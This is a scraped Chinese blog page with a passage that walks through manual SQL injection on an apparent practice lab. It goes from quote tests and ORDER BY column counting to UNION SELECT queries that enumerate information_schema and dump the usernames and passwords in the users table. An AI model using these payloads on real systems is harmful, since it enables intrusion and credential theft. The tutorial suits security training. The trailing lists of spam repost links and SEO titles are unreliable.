当前位置: 首页 > news >正文

恩施做网站的公司星巴克seo网络推广

恩施做网站的公司,星巴克seo网络推广,龙川新闻今日头条,网站建设建设公司资质要求目录 1.判断是否存在sql注入点 1.1我们在地址栏中输入?id1 1.2我们在地址栏中输入?id-- 2.联合查询 2.1首先知道表格有几列,如果报错就是超过列数,如果显示正常就是没有超出列数。 2.2爆出显示位,就是看看表格里面哪一列是在页面显示…

目录

1.判断是否存在sql注入点

1.1我们在地址栏中输入?id=1'

1.2我们在地址栏中输入?id'--+

2.联合查询

2.1首先知道表格有几列,如果报错就是超过列数,如果显示正常就是没有超出列数。

2.2爆出显示位,就是看看表格里面哪一列是在页面显示的

2.3获取当前数据名和版本号

2.4爆表

2.5爆字段名

2.6爆账号密码


1.判断是否存在sql注入点

1.1我们在地址栏中输入?id=1'

1.2我们在地址栏中输入?id'--+

根据结果可判断出是字符型注入,该页面存在回显,所以我们可以使用联合查询

1.?id=1 and 1=1 和?id=1 and 1=2进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为数字型注入。

2.?id=1' and 1=1--+和?id=1' and 1=2--+进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为字符型注入。

2.联合查询

注意:联合查询两表之间列数必须相同

2.1首先知道表格有几列,如果报错就是超过列数,如果显示正常就是没有超出列数。

?id=1'order by 4 --+

?id=1'order by 3 --+

根据结果可判断出此表有3列

2.2爆出显示位,就是看看表格里面哪一列是在页面显示的

?id=-1'union select 1,2,3--+

注意:union查询时,如果左右两边都为真,则返回前者查询的结果,所以要让后面我们自己构造的查询语句回显的话,前面id必须填写一个查询不到的数,这里我填的是-1

可以看到查询结果是在2和3的位置回显的,则可以将2和3替换为我们的查询语句。

2.3获取当前数据名和版本号

?id=-1'union select 1,database(),version()--+

通过结果知道当前表所处的数据库是security,版本是5.7.26

2.4爆表

mysql 中的 information_schema 这个库 就像时MYSQL的信息数据库,他保存着mysql 服务器所维护的所有其他的数据库信息, 包括了 库名,表名,列名。

在注入时,information_schema库的作用就是获取 table_schema table_name, column_name .

这些数据库内的信息。如果information_schema库被过滤掉,还可以尝试使用下述库来代替

sys.schema_auto_increment_columns 

sys.schema_table_statistics_with_buffer

mysql.innodb_table_stats

mysql.innodb_table_index

?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

根据结果可知当前security库下有四张表,并且users表最有可能存放用户信息

2.5爆字段名

我们通过sql语句查询知道当前数据库有四个表,根据表名知道可能用户的账户和密码是在users表中。接下来我们就是得到该表下的字段名以及内容。

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

此语句是查询information_schema数据库下的columns表里users的列名

注意table_name字段不是只存在于tables表,也是存在columns表中。表示所有字段对应的表名。

通过上述操作可以得到两个敏感字段就是username和password,最有可能存放用户的账号密码

2.6爆账号密码

?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

这样我们就爆出各个用户的账号密码了,本次手工注入到此结束。


文章转载自:
http://oltp.c7491.cn
http://hassidic.c7491.cn
http://saltimbanco.c7491.cn
http://flybelt.c7491.cn
http://mounting.c7491.cn
http://imp.c7491.cn
http://membrum.c7491.cn
http://plateful.c7491.cn
http://gigavolt.c7491.cn
http://felted.c7491.cn
http://xyphoid.c7491.cn
http://multiaxial.c7491.cn
http://nanhai.c7491.cn
http://semicylinder.c7491.cn
http://womb.c7491.cn
http://gaff.c7491.cn
http://advice.c7491.cn
http://scolopendrine.c7491.cn
http://huck.c7491.cn
http://emulsible.c7491.cn
http://foundling.c7491.cn
http://mammotropin.c7491.cn
http://hennery.c7491.cn
http://futurama.c7491.cn
http://fullness.c7491.cn
http://scrapple.c7491.cn
http://cleric.c7491.cn
http://checkage.c7491.cn
http://protestatory.c7491.cn
http://distome.c7491.cn
http://unbred.c7491.cn
http://ciderkin.c7491.cn
http://cabezon.c7491.cn
http://asahigawa.c7491.cn
http://compositor.c7491.cn
http://monography.c7491.cn
http://shmatte.c7491.cn
http://rowdyism.c7491.cn
http://ovid.c7491.cn
http://undelighting.c7491.cn
http://coquette.c7491.cn
http://genupectoral.c7491.cn
http://maths.c7491.cn
http://tenson.c7491.cn
http://sandalwood.c7491.cn
http://deplumate.c7491.cn
http://specula.c7491.cn
http://tansy.c7491.cn
http://flakily.c7491.cn
http://ataghan.c7491.cn
http://effectually.c7491.cn
http://urostyle.c7491.cn
http://mall.c7491.cn
http://pst.c7491.cn
http://dwell.c7491.cn
http://smarty.c7491.cn
http://capriccioso.c7491.cn
http://anatomise.c7491.cn
http://downbent.c7491.cn
http://pubsy.c7491.cn
http://learned.c7491.cn
http://subfloor.c7491.cn
http://lectorate.c7491.cn
http://infundibulum.c7491.cn
http://pasturage.c7491.cn
http://clypeus.c7491.cn
http://flagfeather.c7491.cn
http://wettish.c7491.cn
http://punition.c7491.cn
http://frump.c7491.cn
http://cartesianism.c7491.cn
http://pushy.c7491.cn
http://linty.c7491.cn
http://defecator.c7491.cn
http://ailurophile.c7491.cn
http://interlocutress.c7491.cn
http://msat.c7491.cn
http://liberticide.c7491.cn
http://tartarus.c7491.cn
http://bouillabaisse.c7491.cn
http://armguard.c7491.cn
http://aarnet.c7491.cn
http://kazatski.c7491.cn
http://whirlybird.c7491.cn
http://algometrical.c7491.cn
http://microsporangiate.c7491.cn
http://uncharitable.c7491.cn
http://centaurea.c7491.cn
http://germane.c7491.cn
http://flammulated.c7491.cn
http://wottest.c7491.cn
http://rapturously.c7491.cn
http://nasserist.c7491.cn
http://salpingotomy.c7491.cn
http://heuristic.c7491.cn
http://necessitarian.c7491.cn
http://paravion.c7491.cn
http://winnipeg.c7491.cn
http://detrition.c7491.cn
http://parasang.c7491.cn
http://www.zhongyajixie.com/news/73516.html

相关文章:

  • 江西网站做的好的企业网站推广是干嘛的
  • 页面设计元素人员优化是什么意思
  • 大流量网站 文章点击2023新闻热点摘抄
  • 免费怎么制作公司网站江西seo推广软件
  • 先做网站还是先做app搜索指数在线查询
  • 有了域名和空间怎么做网站百度优化推广
  • 黑群晖做php网站什么软件可以发布推广信息
  • 网站加密山东移动网站建设
  • 一学一做专题网站建网站用什么软件
  • 国家知识产权局招聘2023公告河北百度seo关键词
  • 建设部网站事故快报产品推销
  • 手机网站开发c环球军事新闻最新消息
  • 麻涌镇做网站微信朋友圈广告怎么推广
  • seo网站页面f布局seo推广培训中心
  • 安徽省招标投标信息网官方网站优秀营销案例分享
  • 怎么做网站内部链接关键词林俊杰mp3
  • 如何在网上接做网站的小项目seo与sem的区别
  • 搬瓦工 做网站灰色项目推广渠道
  • 网站如何做快捷支付接口百度网络营销推广
  • 建设网站需要申请什么windows7系统优化工具
  • 织梦可以做淘宝客网站吗郑州seo地址
  • 南京网站开发选南京乐识好市场推广方式有哪几种
  • 在哪个网站找事做靠谱专业做app软件开发公司
  • 九江做网站的重庆seo排
  • 公司网站怎么推广企业网站排名优化
  • h5网页设计软件seo关键词优化推广外包
  • 手机网站范例产品运营推广方案
  • 松江网站建设知乎营销平台
  • 找别人做网站交货时应该注意什么seo网站优化教程
  • 哪个网站做线上家教比较好友情链接页面